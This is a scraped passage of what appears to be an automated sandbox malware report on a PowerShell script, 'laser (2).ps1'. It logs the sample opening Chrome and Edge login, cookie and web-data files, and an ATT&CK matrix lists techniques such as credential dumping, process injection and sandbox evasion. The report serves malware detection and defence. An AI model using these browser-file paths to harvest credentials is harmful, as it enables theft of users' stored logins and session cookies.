Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\Desktop\laser (2).ps1 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation	Jump to behavior

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report laser (2).ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
laser (2).ps1

Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	113 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	712 Process Injection	1 Abuse Elevation Control Mechanism	Security Account Manager	221 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	41 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	712 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement